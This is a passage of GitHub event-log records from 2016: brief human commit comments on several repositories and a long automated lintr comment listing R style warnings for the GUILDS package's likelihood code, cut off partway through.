{"id":"4601160325","type":"CommitCommentEvent","actor":{"login":"PhanaticD"},"repo":{"name":"Borlea/EchoPet"},"payload":{"comment":{"id":19126752,"position":null,"line":null,"path":null,"commit_id":"9e287d8909ec23f01e6b09762fb158b26d20a6fc","created_at":"2016-09-22T08:51:41Z","updated_at":"2016-09-22T08:51:41Z","body":"wouldnt removing \"ignoreCancelled = true\" do the opposite of your commit message?"}},"created_at":"2016-09-22T08:51:41Z"}
{"id":"4601160331","type":"CommitCommentEvent","actor":{"login":"KatiRG"},"repo":{"name":"bird-house/flyingpigeon"},"payload":{"comment":{"id":19126753,"position":15,"line":70,"path":"flyingpigeon/processes/wps_plot_timeseries.py","commit_id":"72c7743fb3f963891d0a49820869299a348114cf","created_at":"2016-09-22T08:51:41Z","updated_at":"2016-09-22T08:51:41Z","body":"is line 70 missing `(var)` after the `%`?\r\n\r\nI am getting a syntax error `File \"~/BIRDHOUSE/flyingpigeon/flyingpigeon/processes/wps_plot_timeseries.py\", line 70\r\n    title='Ensemble uncertainty for %s ' %,`"}},"created_at":"2016-09-22T08:51:41Z"}
{"id":"4601160808","type":"CommitCommentEvent","actor":{"login":"wangxiaoerzuiaizhangxiaohua"},"repo":{"name":"wangxiaoerzuiaizhangxiaohua/zhangyanli.github.io"},"payload":{"comment":{"id":19126754,"position":null,"line":null,"path":null,"commit_id":"218c38f1fa11e0bd45eefec2684d59bcb99ea1d1","created_at":"2016-09-22T08:51:47Z","updated_at":"2016-09-22T08:51:47Z","body":"www"}},"created_at":"2016-09-22T08:51:47Z"}
{"id":"4601161991","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"senbox-org/s2tbx"},"payload":{"comment":{"id":19126757,"position":41,"line":147,"path":"s2tbx-s2msi-reader/src/main/java/org/esa/s2tbx/dataio/s2/l1b/L1bMetadata.java","commit_id":"715d0cd2648fd95d746627004f3f84b709f55454","created_at":"2016-09-22T08:52:03Z","updated_at":"2016-09-22T08:52:03Z","body":"Why do you need to exclude the angles here ? There are no angles grid metadata in the userProduct root XML."}},"created_at":"2016-09-22T08:52:03Z"}
{"id":"4601163746","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19126762,"position":null,"line":null,"path":null,"commit_id":"40bba2e75b9c39db855fa25d30685a8b57a57f98","created_at":"2016-09-22T08:52:24Z","updated_at":"2016-09-22T08:52:24Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/calcSumKDA2.R:4:20:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L4) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  results <- matrix( 0, nrow = s, ncol = 1)\n                   ^\n```\n[R/calcSumKDA2.R:7:28:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​    outcomes <- KDA[numbers+1] + (log(I[i]) * numbers)  -\n                          ~^~\n```\n[R/calcSumKDA2.R:8:7:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n      ^\n```\n[R/calcSumKDA2.R:8:15:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n              ^\n```\n[R/calcSumKDA2.R:8:32:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                               ^\n```\n[R/calcSumKDA2.R:8:50:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                 ^\n```\n[R/calcSumKDA2.R:8:52:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                   ^\n```\n[R/calcSumKDA2.R:10:19:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                  ^\n```\n[R/calcSumKDA2.R:10:29:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                            ^\n```\n[R/calcSumKDA2.R:11:19:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                  ^\n```\n[R/calcSumKDA2.R:11:44:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                                           ^\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:5:27:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:6:27:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:14:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    b[cnt] = lgamma(I_X[cnt] + I_Y[cnt] + J) - lgamma(I_X[cnt] + I_Y[cnt])\n           ^\n```\n[R/Condition.R:15:17:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt])\n                ^\n```\n[R/Condition.R:16:17:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt])\n                ^\n```\n[R/Condition.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:21:36:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                  ~^~\n```\n[R/Condition.R:21:51:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                                 ~^~\n```\n[R/Condition.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n               ^\n```\n[R/Condition.R:23:47:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                              ^\n```\n[R/Condition.R:23:51:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                                  ^\n```\n[R/Condition.R:24:53:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L24) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (lgamma(theta_x / 2) + lgamma(theta_y / 2) )\n                                                    ^\n```\n[R/Condition.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n         ^\n```\n[R/Condition.R:25:42:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/Condition.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:33:3:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L33) *style:* **Variable and function names should be all lowercase.**\n```r\n​  incorrectLength <- 0\n  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:34:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:34:39:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:35:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:35:39:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L35) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:37:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(incorrectLength == 1) { \n    ^\n```\n[R/Condition.R:37:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(incorrectLength == 1) { \n     ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:37:28:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L37) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(incorrectLength == 1) { \n                           ^\n```\n[R/Condition.R:37:29:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(incorrectLength == 1) { \n                            ^\n```\n[R/Condition.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tx <- subplex(initVals, g)\n^\n```\n[R/Condition.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:47:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:51:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:55:18:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:55:19:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:56:13:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:56:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:56:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:56:17:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:58:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:60:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:62:18:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L62) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:62:54:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:66:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:69:7:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​ ymax = -1 * maxes$fmin\n      ^\n```\n[R/Condition.R:70:7:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​ xmax = maxes$xmin\n      ^\n```\n[R/Condition.R:71:7:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​ xlft = 0\n      ^\n```\n[R/Condition.R:72:7:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​ xrgt = 1\n      ^\n```\n[R/Condition.R:73:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L73) *style:* **Use <-, not =, for assignment.**\n```r\n​ eps = .Machine$double.eps\n     ^\n```\n[R/Condition.R:75:2:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n ^~~~~~~~~~\n```\n[R/Condition.R:75:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n             ^\n```\n[R/Condition.R:75:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:54:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:77:2:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n ^~~~~~~~~~~\n```\n[R/Condition.R:77:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L77) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n             ^\n```\n[R/Condition.R:77:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:80:4:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkLeftX < 0) {\n   ^\n```\n[R/Condition.R:80:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkLeftX < 0) {\n    ^~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:52:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n                                                   ^\n```\n[R/Condition.R:85:32:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L85) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g, c(eps,xmax)))$root\n                               ^\n```\n[R/Condition.R:88:4:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkRightX < 0) {\n   ^\n```\n[R/Condition.R:88:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkRightX < 0) {\n    ^~~~~~~~~~~\n```\n[R/Condition.R:90:16:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:94:26:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L94) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot( h,c( xmax, 1 - eps)))$root\n                         ^\n```\n[R/Condition.R:97:2:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​ calcLLEXP <- function(x) {\n ^~~~~~~~~\n```\n[R/Condition.R:98:15:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:104:24:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  aux <- integrate(f = calcLLEXP,\n                       ^~~~~~~~~\n```\n[R/Condition.R:111:14:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  return(LL);  \n             ^~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:118:3:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L118) *warning:* **local variable ‘Sx’ assigned but may not be used**\n```r\n​  Sx = length(SADX)\n  ^~\n```\n[R/Condition.R:118:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L118) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L119) *warning:* **local variable ‘Sy’ assigned but may not be used**\n```r\n​  Sy = length(SADY)\n  ^~\n```\n[R/Condition.R:119:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L119) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:120:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L120) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:121:6:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L121) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:122:3:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L122) *warning:* **local variable ‘J’ assigned but may not be used**\n```r\n​  J = Nx + Ny\n  ^\n```\n[R/Condition.R:122:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L122) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:123:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:126:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L126) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(verbose == TRUE) {\n    ^\n```\n[R/Condition.R:128:55:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/Condition.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\"); \n                                                      